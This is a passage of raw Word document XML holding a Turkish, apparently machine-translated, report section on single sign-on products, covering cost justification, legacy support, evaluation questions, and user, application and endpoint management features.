        <w:t>eklenmesi) ve son kullanıcıların hassas uygulamaları kullanmasının izlenmesi. Bir sonraki bölümde, ideal bir tek oturum açma ürününün sunabileceği birçok özellik ve özellik açıklanmaktadır. Maliyetten bahseden öğelerin bazıları, işlevi yerine getiren yazılıma değil, yapılan noktaya atıfta bulunur. Burada tartışıldığı gibi bir ürünün yaşam döngüsü maliyeti, bir kurulumdan diğerine geniş ölçüde değişebilir ve değişebilir. Bu çeşitliliğin derecesi birçok faktöre dayanır ve bu tartışmanın kapsamı dışındadır. SSO ürününün potansiyel ekonomilere ulaşmak için uygulanmasıyla ilgili büyük bir endişe, ürünün maliyeti dikkate alındığında ve bunu, SSO öncesi yapılan işlemlerin maliyeti ile karşılaştırırken ve bunu, bunun işler durumunun maliyetiyle karşılaştırmasıyla ortaya çıkar. SSO'dan sonra, SSO'yu koymanın maliyeti ve projenin tamamlanması sürecinde harcanan diğer tüm dolarlar yapılacaktır. Öncesi ve sonrasındaki harcamaları karşılaştırarak, SSO'yu kurmak için yatırım getirisi (yatırım getirisi) hesaplanabilir ve proje gerekçesinin bir parçası olarak kullanılabilir. Bunun, herhangi bir proje düşünülürken işletmenin uyguladığı eşdeğer formül, kısıtlamalar ve yatırım / yatırım getirisi hedefleri kullanılarak yapılması önerilir. Analiz ve sonuçlar sunulacaksa (bu girişimi desteklediklerini varsayarsak), izleyici, yatırımın sağlamlığı hakkında gerçek maliyetler ve gerçek değer katkısı açısından daha iyi bir anlayışa sahip olacaktır. Bu tür bir içgörü, onaylamayı teşvik eder ve önemli bir maliyet ve uzun uygulama zaman çizelgesinin ne olacağı konusunda daha fazla kabul görmeyi destekler. Ne olursa olsun, bu teknolojinin edinmenin ve sürdürmenin ucuz olmadığını söylemek makul bir şekilde doğrudur. Ek olarak, herhangi bir sorun çözme setinde olduğu gibi, “Bu sorun çözümün fiyatına değer mi?” Sorusu sorulmalıdır. Bir sonraki bölümde, böyle bir kararın alınmasına yardımcı olacak özelliklerden bazıları tartışılmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc9978712"/>
      <w:bookmarkStart w:id="73" w:name="_Toc9979194"/>
      <w:r w:rsidRPr="000D2EFB">
        <w:t>2.6. Dahili Yetenek Vakfı</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">GUI tabanlı merkezi yönetime sahip olmak, basitleştirilmiş kullanıcı yönetimi için potansiyel sunar ve bu nedenle düşük eğitimde, düşük yönetimsel çabada ve kullanıcı yönetimi için daha düşük yaşam döngüsü maliyetinde önemli ölçüde maliyet tasarrufu sağlar. Bunun altında, bazı DBMS motorlarına ve bir dizi rapor oluşturma aracına dayanarak, SSO ürünü aracılığıyla elde edilen etkinlik raporlaması ve adli analiz için veri azaltma sürecini geliştiren ve kolaylaştıracak bir kayıt tutma özelliği olacaktır. Temel destek yapısı doğrudan (standart geleneksel giriş) ve Web tabanlı erişimi içermelidir. Bu, özellikle İnternet artık çok özel bir hale geldi ve aynı zamanda artan sayıda uygulama bir tür Web etkin / bilinçli arayüz kullanıyorsa, bu standart olacaktır. Bu, SSO uygulamasının, doğrudan çevirmeli veya Web üzerinden uzaktan erişimi pratik hale getirmek için oturum açma işleminin kapsamını veya derinliğini mutlaka sınırlayacağı anlamına gelir. Endişenin bir yönü, uygulamanın müdahaleci olmamasıdır. Saldırganlık, ürünün işlevselliğini sağlamak için çalışma ortamının ne derece değiştirilmesi gerektiğidir. Bir diğeri ise eski sistemlerin ve uygulamaların güçlendirilmesidir. SSO ürününün kuruluştaki çeşitli platformlara kurulması genellikle özel kod seviyesini en aza indirgemek için API'ler aracılığıyla yapılır. Şaşırtıcı </w:t>
      </w:r>
      <w:r w:rsidRPr="000D2EFB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>olmayan bir şekilde, çoğu SSO çözüm satıcısı, ürünlerini eski sistemleri göz önünde bulundurarak geliştirmiştir. Örneğin, Platinum Technologies (şimdi CA) ürünü AutoSecure SSO, RACF, ACF2 ve TopSecret destekli - hepsi eski sistemler dünyasında doğup büyüyen erişim kontrolü uygulamaları. Ayrıca, Windows NT, Novell ve TCP / IP ağ destekli sistemleri destekler. Bu nedenle günümüzden günümüze kadarki mirası kapsar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc9978713"/>
      <w:bookmarkStart w:id="75" w:name="_Toc9979195"/>
      <w:r>
        <w:t>2.7</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2EFB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Genel Ö</w:t>
      </w:r>
      <w:r w:rsidRPr="000D2EFB">
        <w:t>zellikleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:ind w:firstLine="696"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Doğru SSO ürünü, gerekli tüm özellikleri sağlamalı ve bir kurumsal üretim ortamında kendisini korumalıdır. Açık sistemler dağıtılmış bir bilgi işlem ortamında faaliyet gösteren ve paralel ağ sunucuları ile birlikte çalışan ürünler, kurumsal ihtiyaçları karşılamak için daha dar NOS tabanlı SSO ürünlerinden daha iyi konumlandırılmıştır. Öyleyse, bu teknolojinin vaadi gerçekleşecekse, SSO ürünlerinin oldukça geniş bir dizi sistemi, cihazı ve arayüzü destekleyebilmesi gerektiği açıktır. Bu göz önüne alındığında, bazı ortamların diğerlerinden daha fazla değişiklik gerektireceği açıktır; yani, SSO yapılandırması daha karmaşıktır ve çalışma ortamını büyük ölçüde değiştirir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Aşağıdaki sorularla elde edilen bilgiler uygulama öncesi analizine yardımcı olacaktır: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. SSO müdahaleci değil midir? yani, uygulamaları herhangi bir şekilde değiştirmeye gerek kalmadan tüm uygulamalara erişimi yönetebilir mi? 2. SSO ürünü tüm uygulamalar için tek bir ortak oturum açma ve şifre belirliyor mu? 3. SSO ürünü hangi iş istasyonlarını desteklemektedir? 4. SSO ağ sunucuları hangi işletim sistemlerinde çalışabilir? 5. Hangi fiziksel tanımlama teknolojileri desteklenir (örneğin, Güvenli Kimlik kartı)? 6. Çevirmeli son kullanıcılar destekleniyor mu? 7. İnternet erişimi destekleniyor mu? Öyleyse, kimlik doğrulama ve şifreleme zorunlu mu? 8. SSO masaüstü isteğe bağlı olarak belirli iş istasyonlarının kullanımını (örneğin üretim alanında) daha yakından kontrol etmek için standart masaüstünü değiştirebilir mi? 9. Şifreler, bir son kullanıcının SSO ürününün kontrolünde bir uç nokta uygulaması kullandığı ilk kez otomatik olarak yakalanabilir mi? 10. SSO masaüstünün görünümü, özel bir siteye özgü masaüstü görünümüyle değiştirilebilir mi? 11. SSO zaten kurulmuş olan PKI çerçevesi ile nasıl çalışacak?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc9978714"/>
      <w:bookmarkStart w:id="77" w:name="_Toc9979196"/>
      <w:r w:rsidRPr="005A2AB5">
        <w:t>2.8.Son Kullanıcı Yönetim Tesisleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:ind w:firstLine="696"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu özellikler ve seçenekler hesap oluşturma, parola yönetimi vb. İçin normal işlevler grubunu içerir. Son kullanıcı kimliği ve kimlik doğrulamasının performansı açıktır. Parola yönetimi tüm normal özellikleri içerir: parola yaşlandırma, geçmiş ve sözdizimi kuralları. Resmi tamamlamak için, özellikle uzaktaki son kullanıcılar SSO ürününü kullanacaksa, çeşitli simge tipindeki aygıtları (Secure-ID kartlar), biyometrik aygıtları ve benzerlerini destekleyin. En azından bu desteği sağlayan isteğe bağlı modüller bulunmalı ve mevcut olmalıdır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kullanılması gereken bazı ek özellikler şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Rol bazlı ayrıcalıklar. Bu işlevsellik, büyük sayıda son kullanıcı tarafından paylaşılan sınırlı sayıda rolü yönetmeyi mümkün kılar. Bunun mutlaka bu rolün yetki alanı dışında çalışan bireysel kullanıcılar üzerinde bir etkisi olmayacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>  • Masaüstü kontrolü. Bu, yerel masaüstünün SSO tarafından yönetilen bir masaüstüyle değiştirilmesine izin verir, böylece son kullanıcıların iş istasyonunu destek sorunları yaratacak şekilde kullanmalarını önler (ör. Yetkisiz yazılımlar sunmak). Bu yetenek, iş istasyonlarının son kullanıcılar tarafından paylaşıldığı alanlarda özellikle önemlidir (örneğin üretim alanları).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Uygulama yetkilendirmesi. Bu, başlatılan herhangi bir uygulamanın SSO ürünü tarafından kaydedilmesini ve silinmesini ve kayıtların bireysel uygulama kullanımında tutulmasını sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Mobil kullanıcı desteği. Bu özellik, son kullanıcıların konumlarından veya kullandıkları iş istasyonundan bağımsız olarak masaüstlerine erişmelerini sağlar. Ayrıca, uygulamaların başlatılmasından önce uygun etki alanı sunucusuna erişmek için iş istasyonunu yapılandırmayı ve bireyin tercihlerini iş istasyonuna getirmeyi de içermelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc9978715"/>
      <w:bookmarkStart w:id="79" w:name="_Toc9979197"/>
      <w:r w:rsidRPr="005A2AB5">
        <w:t>2.9. Uygulama Yönetimi Olanakları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SSO bağlamındaki uygulama yönetimi, bir uygulamanın kullanıcıları yönetme veya işleme biçimine benzer şekilde ele alınmasını ifade eder. Ek 7.2'de gösterildiği gibi, SSO'nun gelişmiş durumu, kullanıcıların basit bir şekilde tanımlanmasının / onaylanmasının ötesine geçmiştir ve şimdi uygulama yönetiminin bazı yönlerini kapsamaktadır. Bu yönetim kabiliyeti, uygulama fonksiyonlarının bakımı ve yükseltilmesinden ziyade, kullanıcı masaüstlerinin görünüşü ve uygulama menüleri ve arayüzleri arasında gezinme ile ilgilidir. Bağlam yönetimi, ortak bir konuyla ilgili olan birden fazla oturumun aynı anda etkin olması durumunda, ilgili başka bir oturumun konumu değiştiğinde her oturumun otomatik olarak güncellenmesini sağlar (örneğin, bir sağlık bakımı ortamında, klinisyen doktorun eczane oturumlarının aynı hasta üzerinde olması gerekir) klinik bir karara varırken iki hastanın kayıtlarını karıştırmamaktan kaçınmaktır).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:ind w:firstLine="696"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Uygulama izleme, belirli bir bilgi satırının kullanımını, bu tür bir bilgi sağlamak için programlanmamış bir uygulamada (örneğin, belirli bir kurucuların bir devlet ortamındaki kayıtlarına erişim gibi) kullanımını izlemek istendiğinde özellikle yararlıdır. Uygulama konumlandırma kişiselleştirilmiş ancak merkezi olarak kontrol edilen masaüstleriyle ilgili bir özelliktir. Bu, başlangıçta bir uygulamayı açmak için (muhtemelen bir dizi seçenek arasından seçilen) bir son kullanıcı başlatma betiğinin yapılandırılmasını ve hangi ekranın yükleneceğini bile belirtmesini sağlar. Uygulamaları birbirine bağlayan bir başka özellik de uygulama kaynaştırmasıdır. Bu, uygulamaların birlikte çalışarak son kullanıcının yalnızca tek bir oturumdan haberdar olacağı şekilde çalışmasını sağlar. Son kullanıcıya bakış, uygulamalar arasında son kullanıcı için tamamen </w:t>
      </w:r>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>yeni bir görünüm oluşturmak da dahil olmak üzere uygulamalar arasında basit bir otomatik geçiş arasında değişebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="80" w:name="_Toc9978716"/>
      <w:bookmarkStart w:id="81" w:name="_Toc9979198"/>
      <w:r w:rsidRPr="005A2AB5">
        <w:t>2.10. Uç Nokta Yönetim Olanakları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="3"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          Son nokta yönetimi, bir SSO ürününün temel bir bileşenidir; çünkü onsuz uygulama, aynı bilgiyi iki kez girmek zorunda kalır; Bir kez SSO'da ve bir kez son noktada ise SSO veritabanında bir değişiklik yapılır. Son noktaya iki giriş yöntemi desteklenmelidir: (1) Bir API'yi destekleyen uç nokta sistemlerini güncellemek için API tabanlı aracılar ve (2) API'yi desteklemeyen son nokta sistemlerini güncellemek için oturum animasyonu aracıları. Bu idari hedefi gerçekleştirmek için SSO tarafından sağlanan hizmetler şunları içermelidir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Giriş kontrolu. Bu, son kullanıcılar tarafından uygulamalara erişmek ve her uygulamanın yeteneklerine bağlı olarak, uygulamaya son kullanıcının kendi ayrıcalıklarını tanımlamak için kullanılan araç. Hem API tabanlı hem de oturum tabanlı uygulamalar desteklenmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005A2AB5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Denetim hizmetleri. Bunlar, SSO ürününün kayıt sistemine bilgi yayınlamak isteyen uygulamaları son noktaya getirmek için bir API ile sağlanmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Oturum şifreleme. Bu özellik, uygulamalar ve son kullanıcılar arasında hareket ederken bilgilerin ifşa ve kurcalamaya karşı korunmasını sağlar. Bu özellik, hassas uygulamaların yalnızca açık metin olanakları sağladığı durumlarda bir gereklilik olmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc9978717"/>
      <w:bookmarkStart w:id="83" w:name="_Toc9979199"/>
      <w:r w:rsidRPr="005A2AB5">
        <w:t>2.11. Mobil Kullanıcılar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="705" w:firstLine="60"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
